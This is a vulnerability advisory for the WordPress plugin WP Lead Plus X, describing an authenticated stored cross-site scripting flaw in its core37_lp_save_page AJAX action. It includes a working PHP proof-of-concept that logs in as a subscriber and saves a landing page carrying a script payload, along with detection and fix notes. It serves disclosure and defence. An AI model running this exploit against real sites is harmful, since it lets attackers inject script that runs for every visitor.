WP Lead Plus X < 0.99 - Authenticated Stored Cross-Site Scripting (XSS)
Description
WP Lead Plus X is a WordPress plugin that allows site owners to create custom landing and "squeeze" pages, complete with its own page builder interface capable of inserting custom JavaScript. Unfortunately, this page builder interface relied on an unprotected AJAX action, core37_lp_save_page, to save and update pages, and that action performed neither a capability check nor a nonce check. Any authenticated user (a subscriber suffices) could therefore create or overwrite a landing page containing arbitrary script, which then executes for every visitor of that page.
Proof of Concept
<?php
// Proof of concept for WP Lead Plus X < 0.99 (authenticated stored XSS).
// Flow: (1) log in to wp-login.php with a subscriber account, keeping the session
// cookies in a temporary cookie jar; (2) send one POST to wp-admin/admin-ajax.php
// with action=core37_lp_save_page carrying a landing page whose "code" element
// is a <script> block. The action performs no capability or nonce check, so the
// page is stored as-is.
//
// Usage: php <this script> <site URL> <subscriber username> <subscriber password> [pageID]
//
// Detection note: the abuse is a single admin-ajax.php request with
// action=core37_lp_save_page from a session whose role cannot normally edit
// content; logging that action together with the requesting user's role is
// enough to spot it. The fix on the plugin side is a capability check plus a
// nonce check on the handler (see the vulnerability description above).

// Settings
$url = $argv[1];     // URL of the site
$wp_user = $argv[2]; // Subscriber username
$wp_pass = $argv[3]; // Subscriber password
$urlbits = parse_url($url);
// Only scheme and host are reused, so a site installed under a sub-path would
// need that path appended here. parse_url() failure (false / missing keys) is
// not checked.
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';

// Log in as subscriber. The cookie jar is a temp file holding the WordPress
// session cookies; it is written by this request and read by the next one.
// NOTE(review): the file is never removed, so the session cookies stay on disk
// after the script exits.
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-login.php');
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
// Same fields the wp-login.php form submits.
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $wp_user,
    'pwd' => $wp_pass,
    'wp-submit' => 'Log+In',
    'testcookie' => '1'
)));
// The login response is not inspected: a failed login only shows up as an
// error (or an empty body) in the admin-ajax response echoed at the end.
$output = curl_exec($ch);
curl_close($ch);

// Insert a page with stored XSS.
// 'pageContent' is the rendered landing-page HTML and 'pageSettings' the
// builder's JSON model of the same page; the <script> payload appears in both
// (the HTML "c37-code-container" div and the modelsJSON "code" entry).
// Both values are already percent-encoded here and http_build_query() encodes
// them again, so the plugin presumably decodes once server-side — not visible
// from this script, confirm against the handler.
// 'pageID' => '0' creates a new page; passing an existing ID as argv[4]
// overwrites that page instead.
$params=array(
    'pageContent' => "%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-lp-172110%22%20style%3D%22width%3A%20700px%3B%22%20class%3D%22c37-lp%20c37-step%20ui-sortable%20ui-droppable%22%3E%0A%20%20%20%20%3Csection%20class%3D%22c37-section%20ui-sortable%20ui-droppable%22%20id%3D%22c37-section-643520%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-row%20d-flex%20flex-row%22%20id%3D%22c37-row-326243%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-col-md-12%20c37-col-sm-12%20c37-col-12%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-box-865567%22%20class%3D%22c37-box%20flex-column%20d-flex%20flex-column%20ui-sortable%20ui-droppable%22%3E%0A%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%0A%3Cdiv%20data-original%3D%22false%22%20data-c37-type%3D%22code%22%20class%3D%22c37-lp-element%20c37-item-element%20ui-draggable-handle%22%20id%3D%22c37-code-108583%22%3E%0A%20%20%20%20%3Cdiv%20data-content%3D%22%22%20class%3D%22c37-code-container%22%3E%3Cscript%3Ealert('xss!')%3B%3C%2Fscript%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%0A%3C%2Fdiv%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%20%20%20%20%3C%2Fsection%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20",
    'pageID' => isset($argv[4]) ? $argv[4] : '0',
    'pageSlug'=>'poctest',
    'pageTitle' => 'PoCTest',
    'pageSettings' => '{"isVariant":false,"isPage":true,"variantPageID":0,"webFonts":[],"modelsJSON":{"c37-section-643520":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","layout":12,"containerClass":"","etype":"section","editingElementID":"c37-section-643520"},"c37-row-326243":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","layout":"12","etype":"row","editingElementID":"c37-row-326243"},"c37-box-865567":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","size":{"desktop":12,"tablet":12,"phone":12},"direction":"flex-column","etype":"box","editingElementID":"c37-box-865567"},"c37-code-108583":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","code":"%3Cscript%3Ealert(\'xss!\')%3B%3C%2Fscript%3E","etype":"code","editingElementID":"c37-code-108583"},"page":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","width":"700","codes":{"trackingCode":"","experimentCode":"","beforeBodyClosing":"","afterBodyOpening":"","metaCode":"","customCSSCode":""},"pageTitle":"PoC","pageSlug":"poc","weight":"1","cssID":"c37-lp-172110","editingElementID":"page","etype":"page"}},"flipCountdown":{},"simpleCountdown":{},"previewURL":"","imageSliders":{},"weight":1,"elementsActions":{},"jsCodes":{},"compiledCSS":""}',
    'action' => 'core37_lp_save_page'
);

// Second request: the vulnerable AJAX action, authenticated only by the
// subscriber session cookies from the jar. No nonce is sent because the
// handler does not require one.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-admin/admin-ajax.php');
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded; charset=UTF-8', 'Connection: close'));
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
// The raw admin-ajax response is printed so the operator can see whether the
// save succeeded; no success/failure parsing is done.
$output = curl_exec($ch);
echo $output;
curl_close($ch);
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Ramuel Gall (Wordfence)
Submitter
Ramuel Gall
Verified
No
WPVDB ID
Timeline
Publicly Published
2020-04-07 (about 4 years ago)
Added
2020-04-07 (about 4 years ago)
Last Updated
2021-01-19 (about 3 years ago)